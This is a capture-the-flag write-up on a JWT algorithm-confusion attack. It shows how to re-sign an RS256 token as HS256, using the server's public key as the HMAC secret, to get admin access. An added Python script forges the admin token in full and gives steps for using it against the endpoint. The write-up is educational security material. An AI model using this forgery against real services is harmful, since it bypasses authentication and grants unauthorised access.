JSON Web Token (JWT) - Public key
Medium
Last updated
The first endpoint, /key, provides the public key.
The second endpoint, /auth, provides a JWT token for your username (you need to send it in the request body - method POST).
The third endpoint, /admin, checks whether you are admin or not via Authorization: Bearer YOURTOKEN
(you need to provide your token - method POST). If you are admin, you will get the flag.
First, get the public key:
Next, I get a sample JWT token; you can't use admin as the value for username:
Use jwt.io to decode this value:
The payload is simple: just the username. Pay attention to the header: the algorithm is RS256.
With this algorithm the token is signed with the private key and verified with the public key.
We only have the public key, so we can't sign a new valid token to access /admin.
So what happens if we change the algorithm to HS256, which uses the same key to sign and verify?
If the server reads alg from the (unverified) token header and passes its RSA public key into the verify call, that public key becomes the HMAC secret, and we already have it from /key. Okay, let's try:
Use the code below to create a new JWT token with the HS256 algorithm:
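The script the writeup used is not reproduced on this page. The following is an added example, not the author's code: it decodes the RS256 token issued by /auth, switches alg to HS256, sets username to admin and re-signs with the PEM from /key as the HMAC secret. PUBLIC_KEY_PEM and the sample token are constructed placeholders, and verify_hs256 is an assumed model of the vulnerable server's HS256 branch, consistent with the behaviour described above but not taken from the challenge source.

```python
import base64
import hashlib
import hmac
import json

# Constructed stand-in for the PEM served by /key. It is not a real RSA key:
# the algorithm-confusion attack only needs the exact bytes the server holds,
# because those bytes become the HMAC secret once alg is switched to HS256.
PUBLIC_KEY_PEM = (
    "-----BEGIN PUBLIC KEY-----\n"
    "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAcONSTRUCTEDplaceholderBYTES\n"
    "-----END PUBLIC KEY-----\n"
)


def b64url_encode(data: bytes) -> str:
    """JWT-style base64url without padding."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    """Inverse of b64url_encode; re-adds the padding urlsafe_b64decode needs."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def encode_segment(obj: dict) -> str:
    """Compact JSON, then base64url, as a JWT header or payload segment."""
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def decode_unverified(token: str) -> tuple[dict, dict]:
    """Split a JWT into (header, payload) without checking the signature, as jwt.io does."""
    header_b64, payload_b64, _signature = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))


def sign_hs256(header: dict, payload: dict, key: bytes) -> str:
    """Build header.payload.signature with HMAC-SHA256 over the signing input."""
    signing_input = f"{encode_segment(header)}.{encode_segment(payload)}"
    mac = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(mac)}"


def verify_hs256(token: str, key: bytes) -> bool:
    """Assumed model of the vulnerable server's HS256 branch: it honours the alg
    from the untrusted header and hands its RSA public-key bytes to HMAC-SHA256."""
    header_b64, payload_b64, signature_b64 = token.split(".")
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(signature_b64))


def forge_admin_token(rs256_token: str, key: bytes) -> str:
    """Take the RS256 token issued for a normal user, flip alg to HS256,
    set username to admin and re-sign with the public key as the secret."""
    header, payload = decode_unverified(rs256_token)
    header["alg"] = "HS256"
    payload["username"] = "admin"
    return sign_hs256(header, payload, key)


def key_variants(pem: str) -> dict[str, bytes]:
    """Byte-for-byte variants of the PEM worth trying: HMAC verification only
    succeeds if the server's copy matches exactly (trailing newline, CRLF)."""
    return {
        "as served": pem.encode(),
        "no trailing newline": pem.rstrip("\n").encode(),
        "crlf line endings": pem.replace("\n", "\r\n").encode(),
    }


def make_sample_rs256_token() -> str:
    """Constructed example of what /auth returns for a non-admin user; the
    signature bytes are arbitrary because RS256 is never verified here."""
    header = {"alg": "RS256", "typ": "JWT"}
    payload = {"username": "guest"}
    signing_input = f"{encode_segment(header)}.{encode_segment(payload)}"
    return f"{signing_input}.{b64url_encode(b'constructed-rs256-signature-bytes')}"


def main() -> None:
    issued = make_sample_rs256_token()
    print("header/payload from /auth:", decode_unverified(issued))
    for label, key in key_variants(PUBLIC_KEY_PEM).items():
        forged = forge_admin_token(issued, key)
        print(f"\n[{label}] send as: Authorization: Bearer {forged}")
        print("   verifies under HS256 with this key:", verify_hs256(forged, key))


if __name__ == "__main__":
    main()
```

To use it against the challenge, paste the real /key response into PUBLIC_KEY_PEM and the real /auth token into make_sample_rs256_token, then POST each candidate to /admin. If every variant is rejected, the usual cause is a byte mismatch between your copy of the PEM and the one the server loaded, not a failure of the technique. The HMAC is done by hand because current PyJWT releases refuse to use a key that looks like a PEM as an HMAC secret (InvalidKeyError), which is exactly the mix the attack relies on.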
With this token I can access /admin and get the flag: